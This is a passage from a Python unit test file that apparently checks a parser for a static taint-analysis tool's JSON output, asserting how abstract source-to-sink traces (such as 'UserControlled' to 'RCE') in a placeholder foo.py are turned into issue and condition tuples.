"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [ { "always-via": "source-feature" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(x)[parameter]",
"length": 2
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
}
],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source into a return sink.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"tito": [ { "line": 30, "start": 31, "end": 32 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"leaves": [ { "kind": "RCE" } ]
}
]
}
],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=30, begin_column=32, end_column=32
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="leaf",
port="sink",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("RCE", 0)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 0)},
# pyre-fixme[6]: Expected `str` but got `None`
final_sinks={(None, "RCE", 0)},
features=[
"has:first-index",
"first-index:payload",
"always-via:tito",
],
fix_info=None,
)
],
)
def testIssueV3(self) -> None:
# Indirect source to indirect sink.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source"
],
"port": "result"
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"local_features": [ { "always-via": "source-local" } ],
"kinds": [
{
"kind": "UserControlled",
"length": 1,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "source-feature" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink"
],
"port": "formal(x)[parameter]"
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"local_features": [ { "always-via": "sink-local" } ],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[ParseTraceFeature("always-via:source-local", [])],
type_interval=None,
annotations=[],
)
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[ParseTraceFeature("always-via:sink-local", [])],
type_interval=None,
annotations=[],
)
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Direct source + indirect source to direct sink + indirect sink.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "via": "source-direct" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 120,
"start": 121,
"end": 122
},
"resolves_to": [
"foo.source"
],
"port": "result"
},
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_other_user_controlled" } ],
"features": [ { "always-via": "source-indirect" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"kinds": [
{
"kind": "RCE",
"leaves": [ { "name": "_other_remote_code_execution" } ],
"features": [ { "always-via": "sink-direct" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 220,
"start": 221,
"end": 222
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)"
},
"kinds": [
{
"kind": "RCE",
"length": 5,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "via": "sink-indirect" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
SourceLocation(
line_no=113, begin_column=115, end_column=115
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=120,
begin_column=122,
end_column=122,
),
leaves=[("UserControlled", 2)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(y)",
location=SourceLocation(
line_no=220,
begin_column=222,
end_column=222,
),
leaves=[("RCE", 5)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 2),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 5),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# direct source with multiple leaves to direct sinks with multiple leaves.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [ { "line": 110, "start": 111, "end": 112 } ],
"kinds": [
{
"kind": "UserControlled",
"leaves": [
{ "name": "_user_controlled" },
{ "name": "_other_user_controlled" }
],
"features": [ { "via": "source-direct" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"kinds": [
{
"kind": "RCE",
"leaves": [
{ "name": "_remote_code_execution" },
{ "name": "_other_remote_code_execution" }
],
"features": [ { "always-via": "sink-direct" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 0),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 0),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source with multiple callees to indirect sinks with multiple callees.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result"
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"kinds": [
{
"kind": "UserControlled",
"length": 1,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "source-feature" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(x)[parameter]"
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source with multiple kinds to indirect sinks with multiple kinds.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled, Header] to [RCE, SQL]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": ["foo.source"],
"port": "result"
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"kinds": [
{
"kind": "UserControlled",
"length": 1,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "source-feature" } ]
},
{
"kind": "Header",
"length": 2,
"leaves": [ { "name": "_header" } ],
"features": [ { "always-via": "source-other-feature" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": ["foo.sink"],
"port": "formal(x)[parameter]"
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"kinds": [
{
"kind": "RCE",
"length": 3,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "sink-feature" } ]
},
{
"kind": "SQL",
"length": 2,
"leaves": [ { "name": "_sql" } ],
"features": [ { "always-via": "sink-other-feature" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled, Header] to [RCE, SQL]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1), ("Header", 2)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 3), ("SQL", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 1),
("_header", "Header", 2),
},
final_sinks={
("_remote_code_execution", "RCE", 3),
("_sql", "SQL", 2),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source into a return sink.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"tito": [ { "line": 30, "start": 31, "end": 32 } ],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"kinds": [ { "kind": "RCE" } ]
}
]
}
],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=30, begin_column=32, end_column=32
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="leaf",
port="sink",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("RCE", 0)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 0)},
# pyre-fixme[6]: Expected `str` but got `None`
final_sinks={(None, "RCE", 0)},
features=[
"has:first-index",
"first-index:payload",
"always-via:tito",
],
fix_info=None,
)
],
)
def testSourceModelV2(self) -> None:
# User-declared source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "UserControlled" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Direct source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" },
{ "kind": "Header", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Direct source with multiple leaves.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" },
{ "kind": "UserControlled", "name": "_other_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_other_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct source with ports on leaves (e.g, cross-repo),
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
},
{
"kind": "UserControlled",
"name": "_cross_repo",
"port": "producer:1:result"
},
{
"kind": "Header",
"name": "_cross_repo",
"port": "producer:1:result"
},
{
"kind": "UserControlled",
"name": "_cross_repo_other",
"port": "producer:1:result"
},
{
"kind": "UserControlled",
"name": "_cross_repo",
"port": "producer:2:result"
}
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:2:result",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[field]",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" },
{ "kind": "Header", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2), ("Header", 2)],
caller_port="result[field]",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect source with multiple callees.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.other_source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sources.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]",
"length": 2
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared parameter source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "UserControlled" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"leaves": [ { "kind": "UserControlled" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
